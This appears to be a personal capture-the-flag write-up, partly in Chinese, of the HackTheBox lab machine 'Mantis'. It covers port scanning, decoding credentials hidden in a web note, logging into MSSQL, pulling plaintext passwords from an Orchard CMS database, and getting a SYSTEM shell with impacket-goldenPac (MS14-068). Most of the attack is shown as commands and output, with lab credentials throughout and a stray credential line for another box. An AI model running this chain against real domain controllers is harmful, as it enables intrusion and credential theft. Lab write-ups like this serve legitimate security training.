Mantis(螳螂)
1. User
1.1. Recon
1.1.1. PortScan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-18 03:29 EDT
Nmap scan report for 10.129.183.192
Host is up (0.080s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-18 07:29:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local,
Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
(workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.129.183.192:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ms-sql-info:
| 10.129.183.192:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-18T07:21:42
|_Not valid after: 2055-10-18T07:21:42
|_ssl-date: 2025-10-18T07:30:54+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local,
Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Microsoft IIS httpd 7.5
|_http-title: Tossed Salad - Blog
|_http-server-header: Microsoft-IIS/7.5
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49173/tcp open msrpc Microsoft Windows RPC
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.129.183.192:50255:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ms-sql-info:
| 10.129.183.192:50255:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 50255
|_ssl-date: 2025-10-18T07:30:54+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-18T07:21:42
|_Not valid after: 2055-10-18T07:21:42
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1,
cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard
6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2025-10-18T03:30:46-04:00
| smb2-time:
| date: 2025-10-18T07:30:45
|_ start_date: 2025-10-18T07:21:38
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: mean: 34m19s, deviation: 1h30m44s, median: 1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/
.
Nmap done: 1 IP address (1 host up) scanned in 92.48 seconds
1.1.2. smb
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# nxc smb 10.129.255.35 -u '' -p '' --shares
SMB 10.129.255.35 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.255.35 445 MANTIS [+] htb.local\:
SMB 10.129.255.35 445 MANTIS [-] Error enumerating shares: STATUS_ACCESS_DENIED
1.2. web 1337
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# dirsearch -u http://10.129.255.35:1337 -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/Mantis/reports/http_10.129.255.35_1337/_25-10-18_15-51-43.txt
Target: http://10.129.255.35:1337/
[15:51:43] Starting:
[15:51:56] 301 - 163B - /aspnet_client -> http://10.129.255.35:1337/aspnet_client/
Task Completed
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# dirsearch -u http://10.129.255.35:1337 -x 403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 220545
Output File: /root/Desktop/htb/Mantis/reports/http_10.129.255.35_1337/_25-10-18_15-55-41.txt
Target: http://10.129.255.35:1337/
[15:55:41] Starting:
[15:56:51] 500 - 3KB - /orchard
>>>> [16:00:32] 301 - 162B - /secure_notes -> http://10.129.255.35:1337/secure_notes/
Task Completed
底下有东西
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# curl http://10.129.255.35:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# curl http://10.129.255.35:1337/secure_notes/web.config -I
HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Oct 2025 20:17:44 GMT
获取了一个凭证
#OrchardCMS admin creadentials
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# echo "010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001" | perl -lpe '$_=pack"B*",$_'
@dm!n_P@ssW0rd!
admin @dm!n_P@ssW0rd!
文件名也不寻常,像是base64
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# echo 'NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx' |base64 -d |xxd -ps -r
m$$ql_S@_P@ssW0rd!
m$$ql_S@_P@ssW0rd! 这密码一看就是mssql的
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# nxc mssql 10.129.242.213 -u 'admin' -p 'm$$ql_S@_P@ssW0rd!' --local-auth
MSSQL 10.129.242.213 1433 MANTIS [*] Windows 7 / Server 2008 R2 Build 7601 (name:MANTIS) (domain:htb.local)
MSSQL 10.129.242.213 1433 MANTIS [+] MANTIS\admin:m$$ql_S@_P@ssW0rd!
1.3. mssql
SQL (admin admin@orcharddb)> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------------------------------------------------- ----------
orcharddb dbo blog_Orchard_Blogs_RecentBlogPostsPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Blogs_BlogArchivesPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Workflows_TransitionRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Workflows_WorkflowRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Workflows_WorkflowDefinitionRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Workflows_AwaitingActivityRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Workflows_ActivityRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Tags_TagsPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Framework_DataMigrationRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Tags_TagRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Tags_ContentTagRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ContentFieldDefinitionRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Framework_DistributedLockRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ContentPartDefinitionRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ContentPartFieldDefinitionRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ContentTypeDefinitionRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ContentTypePartDefinitionRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ShellDescriptorRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ShellFeatureRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ShellFeatureStateRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ShellParameterRecord b'BASE TABLE'
orcharddb dbo blog_Settings_ShellStateRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Framework_ContentItemRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Framework_ContentItemVersionRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Framework_ContentTypeRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Framework_CultureRecord b'BASE TABLE'
orcharddb dbo blog_Common_BodyPartRecord b'BASE TABLE'
orcharddb dbo blog_Common_CommonPartRecord b'BASE TABLE'
orcharddb dbo blog_Common_CommonPartVersionRecord b'BASE TABLE'
orcharddb dbo blog_Common_IdentityPartRecord b'BASE TABLE'
orcharddb dbo blog_Containers_ContainerPartRecord b'BASE TABLE'
orcharddb dbo blog_Containers_ContainerWidgetPartRecord b'BASE TABLE'
orcharddb dbo blog_Containers_ContainablePartRecord b'BASE TABLE'
orcharddb dbo blog_Title_TitlePartRecord b'BASE TABLE'
orcharddb dbo blog_Navigation_MenuPartRecord b'BASE TABLE'
orcharddb dbo blog_Navigation_AdminMenuPartRecord b'BASE TABLE'
orcharddb dbo blog_Scheduling_ScheduledTaskRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_ContentPicker_ContentMenuItemPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Alias_AliasRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Alias_ActionRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Autoroute_AutoroutePartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Users_UserPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Roles_PermissionRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Roles_RoleRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Roles_RolesPermissionsRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Roles_UserRolesPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Packaging_PackagingSource b'BASE TABLE'
orcharddb dbo blog_Orchard_Recipes_RecipeStepResultRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_OutputCache_CacheParameterRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_MediaProcessing_ImageProfilePartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_MediaProcessing_FilterRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_MediaProcessing_FileNameRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Widgets_LayerPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Widgets_WidgetPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Comments_CommentPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Comments_CommentsPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Taxonomies_TaxonomyPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Taxonomies_TermPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Taxonomies_TermContentItem b'BASE TABLE'
orcharddb dbo blog_Orchard_Taxonomies_TermsPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_MediaLibrary_MediaPartRecord b'BASE TABLE'
orcharddb dbo blog_Orchard_Blogs_BlogPartArchiveRecord b'BASE TABLE'
表里面数据太多了,用GUI连接
可以获取到明文密码
James J@m3s_P@ssW0rd!
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# adr james nxc smb
开始执行命令: nxc smb 10.129.242.213 -u 'james' -p 'J@m3s_P@ssW0rd!'
SMB 10.129.242.213 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.242.213 445 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd!
命令: nxc smb 10.129.242.213 -u 'james' -p 'J@m3s_P@ssW0rd!'
1.4. user as james
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# nxc smb 10.129.242.213 -u 'james' -p 'J@m3s_P@ssW0rd!' --generate-tgt james
SMB 10.129.242.213 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.242.213 445 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd!
SMB 10.129.242.213 445 MANTIS [+] TGT saved to: james.ccache
SMB 10.129.242.213 445 MANTIS [+] Run the following command to use the TGT: export KRB5CCNAME=james.ccache
hercules.htb ken.w:change* th1s_p@ssw ()rd!!
1.5. bloodhound
2. system
2.1. MS14-068
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file craJpUBS.exe
[*] Opening SVCManager on mantis.....
[*] Creating service tMrZ on mantis.....
[*] Starting service tMrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system